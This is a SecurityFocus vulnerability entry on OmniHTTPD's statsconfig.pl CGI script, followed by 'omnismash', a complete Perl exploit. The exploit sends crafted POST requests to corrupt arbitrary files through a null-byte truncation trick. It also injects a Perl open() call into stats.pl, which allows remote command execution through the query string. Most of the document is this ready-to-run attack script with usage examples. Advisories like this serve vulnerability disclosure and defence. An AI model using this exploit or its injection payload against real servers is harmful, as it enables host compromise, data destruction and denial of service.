source: http://www.securityfocus.com/bid/2211/info

OmniHTTPD is a compact Windows based web server by Omnicron Technologies. OmniHTTPD has various features including multiple domain support, keep-alive connections, supports virtual IP and non-IP servers and standard CGI support.

Due to the implementation of 'statsconfig.pl' multiple vulnerabilities exist in OmniHTTPD. It is possible to corrupt various known filenames and execute arbitrary commands. By appending a known filename to the 'cgidir' form variable accompanied with a null argument, the known filename will be corrupt. In addition, it is possible to execute commands on the target server. This is due to statsconfig.pl creating a perl script on the file. When the perl script is created, user supplied data (the mostbrowsers form variable if it is present) is written directly to the perl script file. If an attacker sets this value to semi-colon separated perl commands, they will be executed when statsconfig runs the script. This can result in an attacker gaining interactive access on the victim host with the privilege level of the webserver/cgi process.

Successful exploitation of this vulnerability could lead to complete comprimise of the host or denial of service. 

#!/usr/bin/perl

######################################################
#                                                    #
# omnismash v1.2 by Joe Testa  [01.08.2001  9:26PM]  #
#              ( joetesta@hushmail.com )             #
#                                                    #
######################################################
#                                                    #
# This program exploits two holes in                 #
# 'statsconfig.pl', a cgi script which is installed  #
# by default by OmniHTTPd v2.07 (and possibly older  #
# versions).                                         #
#                                                    #
# 1.)  Any file on the system may be corrupted,      #
# including those on drives the server does not      #
# reside on.                                         #
#                                                    #
#                                                    #
#   Example:                                         #
#                                                    #
#     perl omnismash.pl localhost 80 -corrupt        #
#                c:\autoexec.bak                     #
#                                                    #
#                                                    #
# 2.)  Code can be injected into                     #
# '/cgi-bin/stats.pl'.  The absolute path to the     #
# the 'cgi-bin' must already be known.               #
#                                                    #
#                                                    #
#   Example:                                         #
#                                                    #
#     perl omnismash.pl localhost 80 -inject         #
#               c:/httpd/cgi-bin                     #
#                                                    #
# This exploit is set to insert a bare 'open()' call #
# to allow command execution like so:                #
#                                                    #
#     http://localhost/cgi-bin/stats.pl?|dir         #
#                                                    #
######################################################


use IO::Socket;


print "\nomnismash v1.2 by Joe Testa  [01.08.2001  9:26PM]\n";
print "             ( joetesta\@hushmail.com )\n\n\n";



if ( scalar @ARGV < 4 ) {
    print "usage:  perl omnismash.pl target port " .
                               "[ -inject cgipath | -corrupt file ]\n";
    exit();
}



$target = $ARGV[ 0 ];
$port = $ARGV[ 1 ];
$inject_or_corrupt = $ARGV[ 2 ];
$stuff = $ARGV[ 3 ];



print "Creating socket... ";
$sock = new IO::Socket::INET( PeerAddr => $target,
                              PeerPort => int( $port ),
                              Proto    => 'tcp' );
die "$!" unless $sock;
print "done.\n";



if ( $inject_or_corrupt eq '-inject' ) {


    $worthless_stuff = "perllib=" . $stuff . "/statsconfig.pl%00&" .
                           "cgidir=" . $stuff;
    
    $more_worthless_stuff = "&deflimit=&mostip=on&mostreq=on&" .
                           "mostbrowsers=on&timelog=on&mostipnum=5&" .
                           "mostreqf=5&mostbrowsernum=5";

    $semi_important_stuff = ";%20if(\$ENV{'QUERY_STRING'})" .
                           "{open(QS,\$ENV{'QUERY_STRING'});}\$a%3D1&" .
                           "logloc=c%3A%2Fhttpd%2Flogs%2Faccess.log&" .
                           "imagebar=%2Fstatsbar.gif&" .
                           "serveradd=%3C%21--%23echo+var%3D&" .
                           "barwidth=100&barheight=5&listpass=&" .
                           "bgcolor=%23FFFFFF&bgimage=&" .
                           "ttBGcolor=%23FFFFDD";

    $exploit = $worthless_stuff . $more_worthless_stuff .
                                                 $semi_important_stuff;


} elsif ( $inject_or_corrupt eq '-corrupt' ) {


    # Cheap hex encoding....
    $stuff =~ s/:/\%3A/g;       # ':' => %3A
    $stuff =~ s/\\/\%2F/g;      # '\' => %2F
    $stuff =~ s/\//\%2F/g;      # '/' => %2F
    $stuff =~ s/ /\%20/g;       # ' ' => %20
    $stuff =~ s/\./%2E/g;       # '.' => %2E



    # This appends a hex-encoded null character to the file to truncate
    # text that is appended to it by statsconfig.pl during processing.

    $stuff .= "%00";


    # Construct the exploit string.  This does nothing more than set
    # the 'perllib' and 'cgidir' fields to our null-padded filename,
    # then add additional fields to pass a series of "if()" checks.

    $worthless_stuff = "&deflimit=&mostip=on&mostreq=on&" .
                       "mostbrowsers=on&timelog=on&mostipnum=5&" .
                       "mostreqf=5&mostbrowsernum=5&" .
                       "logloc=c%3A%2Fhttpd%2Flogs%2Faccess.log&" .
                       "imagebar=%2Fstatsbar.gif&" .
                       "serveradd=%3C%21--%23echo+var%3D&" .
                       "barwidth=100&barheight=5&listpass=&" .
                       "bgcolor=%23FFFFFF&bgimage=&" .
                       "ttBGcolor=%23FFFFDD";

    $exploit = "perllib=" . $stuff . "&cgidir=" . $stuff .
                                                      $worthless_stuff;

}

$length = length( $exploit );



# Write the string to the socket...

print "Sending exploit string... ";
print $sock "POST /cgi-bin/statsconfig.pl HTTP/1.0\n";
print $sock "Content-type: application/x-www-form-urlencoded\n";
print $sock "Content-length: $length\n\n";

print $sock $exploit;
print "done.\n";


# Read result from server...

print "Waiting for response...\n\n";
read( $sock, $buffer, 1024 );
print $buffer;


close( $sock );
exit();